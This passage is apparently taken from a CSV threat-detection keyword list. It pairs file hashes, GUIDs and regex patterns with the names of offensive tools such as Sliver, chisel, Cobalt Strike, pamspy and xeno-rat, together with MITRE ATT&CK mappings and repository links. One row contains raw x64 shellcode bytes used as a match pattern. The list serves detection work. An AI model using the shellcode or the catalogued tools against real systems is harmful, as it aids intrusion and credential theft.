"*4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749*",".{0,1000}4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03*",".{0,1000}4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55*",".{0,1000}4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" 
"*4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8*",".{0,1000}4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e*",".{0,1000}4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c*",".{0,1000}4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d*",".{0,1000}4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*4EF73752-78B0-4E0D-A33B-B6637B6C2177*",".{0,1000}4EF73752\-78B0\-4E0D\-A33B\-B6637B6C2177.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*4F169EA5-8854-4258-9D2C-D44F37D88776*",".{0,1000}4F169EA5\-8854\-4258\-9D2C\-D44F37D88776.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9*",".{0,1000}4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*",".{0,1000}4F2AD0E0\-8C4D\-45CB\-97DE\-CE8D4177E7BF.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408*",".{0,1000}4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4FB03AD0-96FF-4730-801A-4F997795D920*",".{0,1000}4FB03AD0\-96FF\-4730\-801A\-4F997795D920.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a*",".{0,1000}4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8*",".{0,1000}4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4g3nt47/Striker*",".{0,1000}4g3nt47\/Striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*50050/SharpC2*",".{0,1000}50050\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71*",".{0,1000}5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control 
server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322*",".{0,1000}503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*",".{0,1000}505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*5067F916-9971-47D6-BBCB-85FB3982584F*",".{0,1000}5067F916\-9971\-47D6\-BBCB\-85FB3982584F.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8*",".{0,1000}506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee*",".{0,1000}507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a*",".{0,1000}50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*",".{0,1000}5086CE01\-1032\-4CA3\-A302\-6CFF2A8B64DC.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" 
"*50941ad9fd99db6fca5debc3c89b3e899a9527d7*",".{0,1000}50941ad9fd99db6fca5debc3c89b3e899a9527d7.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5*",".{0,1000}50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129*",".{0,1000}51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d*",".{0,1000}510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c*",".{0,1000}512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909*",".{0,1000}51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*516280565958*",".{0,1000}516280565958.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*516280565959*",".{0,1000}516280565959.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e*",".{0,1000}5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed*",".{0,1000}518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154*",".{0,1000}5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff*",".{0,1000}51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e*",".{0,1000}51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb*",".{0,1000}51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*51C6E016-1428-441D-82E9-BB0EB599BBC8*",".{0,1000}51C6E016\-1428\-441D\-82E9\-BB0EB599BBC8.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" 
"*51E46096-4A36-4C7D-9773-BC28DBDC4FC6*",".{0,1000}51E46096\-4A36\-4C7D\-9773\-BC28DBDC4FC6.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda*",".{0,1000}51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334*",".{0,1000}51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*52040049-D7FC-4C72-B6AE-BD2C7AB27DEE*",".{0,1000}52040049\-D7FC\-4C72\-B6AE\-BD2C7AB27DEE.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 
- T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d*",".{0,1000}52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407*",".{0,1000}520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack 